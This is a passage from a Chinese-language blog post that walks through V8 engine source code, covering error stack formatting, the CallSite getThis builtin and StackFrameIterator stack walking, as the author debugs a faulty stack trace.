        <span class="n">JSObject</span><span class="o">::</span><span class="n">SetProperty</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">error_object</span><span class="p">,</span>
                              <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">error_stack_symbol</span><span class="p">(),</span>
                              <span class="n">formatted_stack</span><span class="p">,</span> <span class="n">StoreOrigin</span><span class="o">::</span><span class="n">kMaybeKeyed</span><span class="p">,</span>
                              <span class="n">Just</span><span class="p">(</span><span class="n">ShouldThrow</span><span class="o">::</span><span class="n">kThrowOnError</span><span class="p">)),</span>
        <span class="n">Object</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">formatted_stack</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">error_stack</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// static</span>
<span class="n">MaybeHandle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">ErrorUtils</span><span class="o">::</span><span class="n">FormatStackTrace</span><span class="p">(</span><span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span><span class="p">,</span>
                                                 <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSObject</span><span class="o">&gt;</span> <span class="n">error</span><span class="p">,</span>
                                                 <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">raw_stack</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">FLAG_correctness_fuzzer_suppressions</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">empty_string</span><span class="p">();</span>
  <span class="p">}</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="n">raw_stack</span><span class="o">-&gt;</span><span class="n">IsFixedArray</span><span class="p">());</span>
  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">FixedArray</span><span class="o">&gt;</span> <span class="n">elems</span> <span class="o">=</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">FixedArray</span><span class="o">&gt;::</span><span class="n">cast</span><span class="p">(</span><span class="n">raw_stack</span><span class="p">);</span>

  <span class="k">const</span> <span class="kt">bool</span> <span class="n">in_recursion</span> <span class="o">=</span> <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">formatting_stack_trace</span><span class="p">();</span>
  <span class="k">const</span> <span class="kt">bool</span> <span class="n">has_overflowed</span> <span class="o">=</span> <span class="n">i</span><span class="o">::</span><span class="n">StackLimitCheck</span><span class="p">{</span><span class="n">isolate</span><span class="p">}.</span><span class="n">HasOverflowed</span><span class="p">();</span>
  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Context</span><span class="o">&gt;</span> <span class="n">error_context</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">in_recursion</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">has_overflowed</span> <span class="o">&amp;&amp;</span>
      <span class="n">error</span><span class="o">-&gt;</span><span class="n">GetCreationContext</span><span class="p">().</span><span class="n">ToHandle</span><span class="p">(</span><span class="o">&amp;</span><span class="n">error_context</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">DCHECK</span><span class="p">(</span><span class="n">error_context</span><span class="o">-&gt;</span><span class="n">IsNativeContext</span><span class="p">());</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">isolate</span><span class="o">-&gt;</span><span class="n">HasPrepareStackTraceCallback</span><span class="p">())</span> <span class="p">{</span>
      <span class="p">...</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
      <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSFunction</span><span class="o">&gt;</span> <span class="n">global_error</span> <span class="o">=</span>
          <span class="n">handle</span><span class="p">(</span><span class="n">error_context</span><span class="o">-&gt;</span><span class="n">error_function</span><span class="p">(),</span> <span class="n">isolate</span><span class="p">);</span>

      <span class="c1">// If there's a user-specified "prepareStackTrace" function, call it on</span>
      <span class="c1">// the frames and use its result.</span>

      <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">prepare_stack_trace</span><span class="p">;</span>
      <span class="n">ASSIGN_RETURN_ON_EXCEPTION</span><span class="p">(</span>
          <span class="n">isolate</span><span class="p">,</span> <span class="n">prepare_stack_trace</span><span class="p">,</span>
          <span class="n">JSFunction</span><span class="o">::</span><span class="n">GetProperty</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">global_error</span><span class="p">,</span> <span class="s">"prepareStackTrace"</span><span class="p">),</span>
          <span class="n">Object</span><span class="p">);</span>

      <span class="k">if</span> <span class="p">(</span><span class="n">prepare_stack_trace</span><span class="o">-&gt;</span><span class="n">IsJSFunction</span><span class="p">())</span> <span class="p">{</span>
        <span class="n">PrepareStackTraceScope</span> <span class="n">scope</span><span class="p">(</span><span class="n">isolate</span><span class="p">);</span>

        <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">CountUsage</span><span class="p">(</span><span class="n">v8</span><span class="o">::</span><span class="n">Isolate</span><span class="o">::</span><span class="n">kErrorPrepareStackTrace</span><span class="p">);</span>

        <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSArray</span><span class="o">&gt;</span> <span class="n">sites</span><span class="p">;</span>
        <span class="n">ASSIGN_RETURN_ON_EXCEPTION</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">sites</span><span class="p">,</span>
                                   <span class="n">GetStackFrames</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">elems</span><span class="p">),</span> <span class="n">Object</span><span class="p">);</span>

        <span class="k">const</span> <span class="kt">int</span> <span class="n">argc</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>
        <span class="n">base</span><span class="o">::</span><span class="n">ScopedVector</span><span class="o">&lt;</span><span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;&gt;</span> <span class="n">argv</span><span class="p">(</span><span class="n">argc</span><span class="p">);</span>
        <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">error</span><span class="p">;</span>
        <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">sites</span><span class="p">;</span>

        <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">result</span><span class="p">;</span>

        <span class="n">ASSIGN_RETURN_ON_EXCEPTION</span><span class="p">(</span>
            <span class="n">isolate</span><span class="p">,</span> <span class="n">result</span><span class="p">,</span>
            <span class="n">Execution</span><span class="o">::</span><span class="n">Call</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">prepare_stack_trace</span><span class="p">,</span> <span class="n">global_error</span><span class="p">,</span> <span class="n">argc</span><span class="p">,</span>
                            <span class="n">argv</span><span class="p">.</span><span class="n">begin</span><span class="p">()),</span>
            <span class="n">Object</span><span class="p">);</span>

        <span class="k">return</span> <span class="n">result</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
  <span class="p">}</span>

  <span class="c1">// Otherwise, run our internal formatting logic.</span>
  <span class="p">...</span>
<span class="p">}</span>

<span class="c1">// Convert the raw frames as written by Isolate::CaptureSimpleStackTrace into</span>
<span class="c1">// a JSArray of JSCallSite objects.</span>
<span class="n">MaybeHandle</span><span class="o">&lt;</span><span class="n">JSArray</span><span class="o">&gt;</span> <span class="n">GetStackFrames</span><span class="p">(</span><span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span><span class="p">,</span>
                                    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">FixedArray</span><span class="o">&gt;</span> <span class="n">frames</span><span class="p">)</span> <span class="p">{</span>
  <span class="kt">int</span> <span class="n">frame_count</span> <span class="o">=</span> <span class="n">frames</span><span class="o">-&gt;</span><span class="n">length</span><span class="p">();</span>
  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSFunction</span><span class="o">&gt;</span> <span class="n">constructor</span> <span class="o">=</span> <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">callsite_function</span><span class="p">();</span>
  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">FixedArray</span><span class="o">&gt;</span> <span class="n">sites</span> <span class="o">=</span> <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">NewFixedArray</span><span class="p">(</span><span class="n">frame_count</span><span class="p">);</span>
  <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">frame_count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">CallSiteInfo</span><span class="o">&gt;</span> <span class="n">frame</span><span class="p">(</span><span class="n">CallSiteInfo</span><span class="o">::</span><span class="n">cast</span><span class="p">(</span><span class="n">frames</span><span class="o">-&gt;</span><span class="n">get</span><span class="p">(</span><span class="n">i</span><span class="p">)),</span> <span class="n">isolate</span><span class="p">);</span>
    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSObject</span><span class="o">&gt;</span> <span class="n">site</span><span class="p">;</span>
    <span class="n">ASSIGN_RETURN_ON_EXCEPTION</span><span class="p">(</span>
        <span class="n">isolate</span><span class="p">,</span> <span class="n">site</span><span class="p">,</span>
        <span class="n">JSObject</span><span class="o">::</span><span class="n">New</span><span class="p">(</span><span class="n">constructor</span><span class="p">,</span> <span class="n">constructor</span><span class="p">,</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">AllocationSite</span><span class="o">&gt;::</span><span class="n">null</span><span class="p">()),</span>
        <span class="n">JSArray</span><span class="p">);</span>
    <span class="n">RETURN_ON_EXCEPTION</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span>
                        <span class="n">JSObject</span><span class="o">::</span><span class="n">SetOwnPropertyIgnoreAttributes</span><span class="p">(</span>
                            <span class="n">site</span><span class="p">,</span> <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">call_site_info_symbol</span><span class="p">(),</span>
                            <span class="n">frame</span><span class="p">,</span> <span class="n">DONT_ENUM</span><span class="p">),</span>
                        <span class="n">JSArray</span><span class="p">);</span>
    <span class="n">sites</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="o">*</span><span class="n">site</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">NewJSArrayWithElements</span><span class="p">(</span><span class="n">sites</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>在代码中搜索 callsie 关键字，可以搜到 getThis 的 CPP 实现 BUILTIN(CallSitePrototypeGetThis)。</p>

<pre><code class="language-CPP">BUILTIN(CallSitePrototypeGetThis) {
  HandleScope scope(isolate);
  CHECK_CALLSITE(frame, "getThis");
  if (frame-&gt;IsStrict()) return ReadOnlyRoots(isolate).undefined_value();
  isolate-&gt;CountUsage(v8::Isolate::kCallSiteAPIGetThisSloppyCall);
#if V8_ENABLE_WEBASSEMBLY
  if (frame-&gt;IsAsmJsWasm()) {
    return frame-&gt;GetWasmInstance().native_context().global_proxy();
  }
#endif  // V8_ENABLE_WEBASSEMBLY
  return frame-&gt;receiver_or_instance();
}

#define CHECK_CALLSITE(frame, method)                                         \
  CHECK_RECEIVER(JSObject, receiver, method);                                 \
  LookupIterator it(isolate, receiver,                                        \
                    isolate-&gt;factory()-&gt;call_site_info_symbol(),              \
                    LookupIterator::OWN_SKIP_INTERCEPTOR);                    \
  if (it.state() != LookupIterator::DATA) {                                   \
    THROW_NEW_ERROR_RETURN_FAILURE(                                           \
        isolate,                                                              \
        NewTypeError(MessageTemplate::kCallSiteMethod,                        \
                     isolate-&gt;factory()-&gt;NewStringFromAsciiChecked(method))); \
  }                                                                           \
  Handle&lt;CallSiteInfo&gt; frame = Handle&lt;CallSiteInfo&gt;::cast(it.GetDataValue())
</code></pre>

<p>可以看到 getThis 就是读取了存储在 CallSizeInfo 对象中的 receiver 数据， 往前追溯 CallSiteInfo 的来源，发现是 <code class="language-plaintext highlighter-rouge">JSReceiver::GetDataProperty(error_object, isolate-&gt;factory()-&gt;error_stack_symbol());</code> 语句读取的，在代码中搜索 error_stack_symbol 关键字，找到疑似设置属性的函数 <code class="language-plaintext highlighter-rouge">Isolate::CaptureAndSetErrorStack</code>， 下断点后刷新页面，断点断下，检查调用栈可以看到是 error 对象的构造函数中调用了此函数采集调用栈信息。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">MaybeHandle</span><span class="o">&lt;</span><span class="n">JSObject</span><span class="o">&gt;</span> <span class="n">Isolate</span><span class="o">::</span><span class="n">CaptureAndSetErrorStack</span><span class="p">(</span>
    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSObject</span><span class="o">&gt;</span> <span class="n">error_object</span><span class="p">,</span> <span class="n">FrameSkipMode</span> <span class="n">mode</span><span class="p">,</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">caller</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">TRACE_EVENT0</span><span class="p">(</span><span class="n">TRACE_DISABLED_BY_DEFAULT</span><span class="p">(</span><span class="s">"v8.stack_trace"</span><span class="p">),</span> <span class="n">__func__</span><span class="p">);</span>
  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">error_stack</span> <span class="o">=</span> <span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">undefined_value</span><span class="p">();</span>

  <span class="c1">// Capture the "simple stack trace" for the error.stack property,</span>
  <span class="c1">// which can be disabled by setting Error.stackTraceLimit to a non</span>
  <span class="c1">// number value or simply deleting the property. If the inspector</span>
  <span class="c1">// is active, and requests more stack frames than the JavaScript</span>
  <span class="c1">// program itself, we collect up to the maximum.</span>
  <span class="kt">int</span> <span class="n">stack_trace_limit</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">GetStackTraceLimit</span><span class="p">(</span><span class="k">this</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_trace_limit</span><span class="p">))</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">limit</span> <span class="o">=</span> <span class="n">stack_trace_limit</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">capture_stack_trace_for_uncaught_exceptions_</span> <span class="o">&amp;&amp;</span>
        <span class="o">!</span><span class="p">(</span><span class="n">stack_trace_for_uncaught_exceptions_options_</span> <span class="o">&amp;</span>
          <span class="n">StackTrace</span><span class="o">::</span><span class="n">kExposeFramesAcrossSecurityOrigins</span><span class="p">))</span> <span class="p">{</span>
      <span class="c1">// Collect up to the maximum of what the JavaScript program and</span>
      <span class="c1">// the inspector want. There's a special case here where the API</span>
      <span class="c1">// can ask the stack traces to also include cross-origin frames,</span>
      <span class="c1">// in which case we collect a separate trace below. Note that</span>
      <span class="c1">// the inspector doesn't use this option, so we could as well</span>
      <span class="c1">// just deprecate this in the future.</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">limit</span> <span class="o">&lt;</span> <span class="n">stack_trace_for_uncaught_exceptions_frame_limit_</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">limit</span> <span class="o">=</span> <span class="n">stack_trace_for_uncaught_exceptions_frame_limit_</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
    <span class="n">error_stack</span> <span class="o">=</span> <span class="n">CaptureSimpleStackTrace</span><span class="p">(</span><span class="k">this</span><span class="p">,</span> <span class="n">limit</span><span class="p">,</span> <span class="n">mode</span><span class="p">,</span> <span class="n">caller</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="c1">// Next is the inspector part: Depending on whether we got a "simple</span>
  <span class="c1">// stack trace" above and whether that's usable (meaning the API</span>
  <span class="c1">// didn't request to include cross-origin frames), we remember the</span>
  <span class="c1">// cap for the stack trace (either a positive limit indicating that</span>
  <span class="c1">// the Error.stackTraceLimit value was below what was requested via</span>
  <span class="c1">// the API, or a negative limit to indicate the opposite), or we</span>
  <span class="c1">// collect a "detailed stack trace" eagerly and stash that away.</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">capture_stack_trace_for_uncaught_exceptions_</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">limit_or_stack_frame_infos</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">error_stack</span><span class="o">-&gt;</span><span class="n">IsUndefined</span><span class="p">(</span><span class="k">this</span><span class="p">)</span> <span class="o">||</span>
        <span class="p">(</span><span class="n">stack_trace_for_uncaught_exceptions_options_</span> <span class="o">&amp;</span>
         <span class="n">StackTrace</span><span class="o">::</span><span class="n">kExposeFramesAcrossSecurityOrigins</span><span class="p">))</span> <span class="p">{</span>
      <span class="n">limit_or_stack_frame_infos</span> <span class="o">=</span> <span class="n">CaptureDetailedStackTrace</span><span class="p">(</span>
          <span class="n">stack_trace_for_uncaught_exceptions_frame_limit_</span><span class="p">,</span>
          <span class="n">stack_trace_for_uncaught_exceptions_options_</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
      <span class="kt">int</span> <span class="n">limit</span> <span class="o">=</span>
          <span class="n">stack_trace_limit</span> <span class="o">&gt;</span> <span class="n">stack_trace_for_uncaught_exceptions_frame_limit_</span>
              <span class="o">?</span> <span class="o">-</span><span class="n">stack_trace_for_uncaught_exceptions_frame_limit_</span>
              <span class="o">:</span> <span class="n">stack_trace_limit</span><span class="p">;</span>
      <span class="n">limit_or_stack_frame_infos</span> <span class="o">=</span> <span class="n">handle</span><span class="p">(</span><span class="n">Smi</span><span class="o">::</span><span class="n">FromInt</span><span class="p">(</span><span class="n">limit</span><span class="p">),</span> <span class="k">this</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">error_stack</span> <span class="o">=</span>
        <span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">NewErrorStackData</span><span class="p">(</span><span class="n">error_stack</span><span class="p">,</span> <span class="n">limit_or_stack_frame_infos</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="n">RETURN_ON_EXCEPTION</span><span class="p">(</span>
      <span class="k">this</span><span class="p">,</span>
      <span class="n">JSObject</span><span class="o">::</span><span class="n">SetProperty</span><span class="p">(</span><span class="k">this</span><span class="p">,</span> <span class="n">error_object</span><span class="p">,</span> <span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">error_stack_symbol</span><span class="p">(),</span>
                            <span class="n">error_stack</span><span class="p">,</span> <span class="n">StoreOrigin</span><span class="o">::</span><span class="n">kMaybeKeyed</span><span class="p">,</span>
                            <span class="n">Just</span><span class="p">(</span><span class="n">ShouldThrow</span><span class="o">::</span><span class="n">kThrowOnError</span><span class="p">)),</span>
      <span class="n">JSObject</span><span class="p">);</span>
  <span class="k">return</span> <span class="n">error_object</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>经过几个小时的验证，我确认是在 Error 对象创建过程时抓取到的栈回溯已经出问题了，为了完全搞懂问题出在哪，我接下来分析一下栈回溯的过程。</p>

<p>栈回溯的主要流程在 <code class="language-plaintext highlighter-rouge">VisitStack</code> 函数中，由 StackFrameIterator 对象完成的</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">template</span> <span class="o">&lt;</span><span class="k">typename</span> <span class="nc">Visitor</span><span class="p">&gt;</span>
<span class="kt">void</span> <span class="nf">VisitStack</span><span class="p">(</span><span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span><span class="p">,</span> <span class="n">Visitor</span><span class="o">*</span> <span class="n">visitor</span><span class="p">,</span>
                <span class="n">StackTrace</span><span class="o">::</span><span class="n">StackTraceOptions</span> <span class="n">options</span> <span class="o">=</span> <span class="n">StackTrace</span><span class="o">::</span><span class="n">kDetailed</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">DisallowJavascriptExecution</span> <span class="n">no_js</span><span class="p">(</span><span class="n">isolate</span><span class="p">);</span>
  <span class="k">for</span> <span class="p">(</span><span class="n">StackFrameIterator</span> <span class="n">it</span><span class="p">(</span><span class="n">isolate</span><span class="p">);</span> <span class="o">!</span><span class="n">it</span><span class="p">.</span><span class="n">done</span><span class="p">();</span> <span class="n">it</span><span class="p">.</span><span class="n">Advance</span><span class="p">())</span> <span class="p">{</span>
    <span class="n">StackFrame</span><span class="o">*</span> <span class="n">frame</span> <span class="o">=</span> <span class="n">it</span><span class="p">.</span><span class="n">frame</span><span class="p">();</span>
    <span class="k">switch</span> <span class="p">(</span><span class="n">frame</span><span class="o">-&gt;</span><span class="n">type</span><span class="p">())</span> <span class="p">{</span>
      <span class="k">case</span> <span class="n">StackFrame</span><span class="o">::</span><span class="n">BUILTIN_EXIT</span><span class="p">:</span>
      <span class="k">case</span> <span class="n">StackFrame</span><span class="o">::</span><span class="n">JAVA_SCRIPT_BUILTIN_CONTINUATION</span><span class="p">:</span>
      <span class="k">case</span> <span class="n">StackFrame</span><span class="o">::</span><span class="n">JAVA_SCRIPT_BUILTIN_CONTINUATION_WITH_CATCH</span><span class="p">:</span>
      <span class="k">case</span> <span class="n">StackFrame</span><span class="o">::</span><span class="n">OPTIMIZED</span><span class="p">:</span>
      <span class="k">case</span> <span class="n">StackFrame</span><span class="o">::</span><span class="n">INTERPRETED</span><span class="p">:</span>
      <span class="k">case</span> <span class="n">StackFrame</span><span class="o">::</span><span class="n">BASELINE</span><span class="p">:</span>
      <span class="k">case</span> <span class="n">StackFrame</span><span class="o">::</span><span class="n">BUILTIN</span><span class="p">:</span>
<span class="cp">#if V8_ENABLE_WEBASSEMBLY
</span>      <span class="k">case</span> <span class="n">StackFrame</span><span class="o">::</span><span class="n">WASM</span><span class="p">:</span>
<span class="cp">#endif  // V8_ENABLE_WEBASSEMBLY
</span>      <span class="p">{</span>
        <span class="c1">// A standard frame may include many summarized frames (due to</span>
        <span class="c1">// inlining).</span>
        <span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o">&lt;</span><span class="n">FrameSummary</span><span class="o">&gt;</span> <span class="n">summaries</span><span class="p">;</span>
        <span class="n">CommonFrame</span><span class="o">::</span><span class="n">cast</span><span class="p">(</span><span class="n">frame</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">Summarize</span><span class="p">(</span><span class="o">&amp;</span><span class="n">summaries</span><span class="p">);</span>
        <span class="k">for</span> <span class="p">(</span><span class="k">auto</span> <span class="n">rit</span> <span class="o">=</span> <span class="n">summaries</span><span class="p">.</span><span class="n">rbegin</span><span class="p">();</span> <span class="n">rit</span> <span class="o">!=</span> <span class="n">summaries</span><span class="p">.</span><span class="n">rend</span><span class="p">();</span> <span class="o">++</span><span class="n">rit</span><span class="p">)</span> <span class="p">{</span>
          <span class="n">FrameSummary</span><span class="o">&amp;</span> <span class="n">summary</span> <span class="o">=</span> <span class="o">*</span><span class="n">rit</span><span class="p">;</span>
          <span class="c1">// Skip frames from other origins when asked to do so.</span>
          <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">options</span> <span class="o">&amp;</span> <span class="n">StackTrace</span><span class="o">::</span><span class="n">kExposeFramesAcrossSecurityOrigins</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
              <span class="o">!</span><span class="n">summary</span><span class="p">.</span><span class="n">native_context</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">HasSameSecurityTokenAs</span><span class="p">(</span>
                  <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">context</span><span class="p">()))</span> <span class="p">{</span>
            <span class="k">continue</span><span class="p">;</span>
          <span class="p">}</span>
          <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">visitor</span><span class="o">-&gt;</span><span class="n">Visit</span><span class="p">(</span><span class="n">summary</span><span class="p">))</span> <span class="k">return</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="k">break</span><span class="p">;</span>
      <span class="p">}</span>

      <span class="nl">default:</span>
        <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="n">StackFrameIterator</span><span class="o">::</span><span class="n">StackFrameIterator</span><span class="p">(</span><span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span><span class="p">)</span>
    <span class="o">:</span> <span class="n">StackFrameIterator</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">thread_local_top</span><span class="p">())</span> <span class="p">{}</span>


<span class="n">StackFrameIterator</span><span class="o">::</span><span class="n">StackFrameIterator</span><span class="p">(</span><span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span><span class="p">,</span> <span class="n">ThreadLocalTop</span><span class="o">*</span> <span class="n">t</span><span class="p">)</span>
    <span class="o">:</span> <span class="n">StackFrameIteratorBase</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="nb">true</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">Reset</span><span class="p">(</span><span class="n">t</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">StackFrameIterator</span><span class="o">::</span><span class="n">Reset</span><span class="p">(</span><span class="n">ThreadLocalTop</span><span class="o">*</span> <span class="n">top</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">StackFrame</span><span class="o">::</span><span class="n">State</span> <span class="n">state</span><span class="p">;</span>
  <span class="n">StackFrame</span><span class="o">::</span><span class="n">Type</span> <span class="n">type</span> <span class="o">=</span>
      <span class="n">ExitFrame</span><span class="o">::</span><span class="n">GetStateForFramePointer</span><span class="p">(</span><span class="n">Isolate</span><span class="o">::</span><span class="n">c_entry_fp</span><span class="p">(</span><span class="n">top</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">state</span><span class="p">);</span>
  <span class="n">handler_</span> <span class="o">=</span> <span class="n">StackHandler</span><span class="o">::</span><span class="n">FromAddress</span><span class="p">(</span><span class="n">Isolate</span><span class="o">::</span><span class="n">handler</span><span class="p">(</span><span class="n">top</span><span class="p">));</span>
  <span class="n">frame_</span> <span class="o">=</span> <span class="n">SingletonFor</span><span class="p">(</span><span class="n">type</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">state</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="n">Address</span> <span class="n">c_entry_fp</span><span class="p">(</span><span class="n">ThreadLocalTop</span><span class="o">*</span> <span class="kr">thread</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">return</span> <span class="kr">thread</span><span class="o">-&gt;</span><span class="n">c_entry_fp_</span><span class="p">;</span>
<span class="p">}</span>

</code></pre></div></div>

<p>可以看到是从 thread-&gt;c_entry_fp_ 开始的，通过下数据访问断点，我发现这个变量是在 `Builtins_CEntry_Return1<em>DontSaveFPRegs_ArgvOnStack_BuiltinExit 中设置的，阅读代码发现这个函数负责在 javascript 调用 CPP 的 Runtime 函数时，在栈上构建 BuiltinExitFrame 调用栈，构建好的 BultinExitFrame 会被存储到 thread-&gt;c_entry_fp</em> 中，目前存储的就是调用 ErrorConstruct 构建的 BuiltinExitFrame。</p>

<hr />
<p>⚡查资料来看 v8 的调用栈分很多种类型，适合不同的场景，比如从 CPP 到 Javascript 代码会构建一个 EntryFrame，解释器会构建一个 InterpretedFrame， Javascript 调用 CPP 函数会构建 ExitFrame/BuiltinExitFrame</p>

<hr />

<p>那么栈回溯就是从 ErrorConstruct 的栈帧开始，之后通过 <code class="language-plaintext highlighter-rouge">StackFrameIterator::Advance</code> 函数移动到调用方。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">StackFrameIterator</span><span class="o">::</span><span class="n">Advance</span><span class="p">()</span> <span class="p">{</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="o">!</span><span class="n">done</span><span class="p">());</span>
  <span class="c1">// Compute the state of the calling frame before restoring</span>
  <span class="c1">// callee-saved registers and unwinding handlers. This allows the</span>
  <span class="c1">// frame code that computes the caller state to access the top</span>
  <span class="c1">// handler and the value of any callee-saved register if needed.</span>
  <span class="n">StackFrame</span><span class="o">::</span><span class="n">State</span> <span class="n">state</span><span class="p">;</span>
  <span class="n">StackFrame</span><span class="o">::</span><span class="n">Type</span> <span class="n">type</span> <span class="o">=</span> <span class="n">frame_</span><span class="o">-&gt;</span><span class="n">GetCallerState</span><span class="p">(</span><span class="o">&amp;</span><span class="n">state</span><span class="p">);</span>

  <span class="c1">// Unwind handlers corresponding to the current frame.</span>
  <span class="n">StackHandlerIterator</span> <span class="n">it</span><span class="p">(</span><span class="n">frame_</span><span class="p">,</span> <span class="n">handler_</span><span class="p">);</span>
  <span class="k">while</span> <span class="p">(</span><span class="o">!</span><span class="n">it</span><span class="p">.</span><span class="n">done</span><span class="p">())</span> <span class="n">it</span><span class="p">.</span><span class="n">Advance</span><span class="p">();</span>
  <span class="n">handler_</span> <span class="o">=</span> <span class="n">it</span><span class="p">.</span><span class="n">handler</span><span class="p">();</span>

  <span class="c1">// Advance to the calling frame.</span>
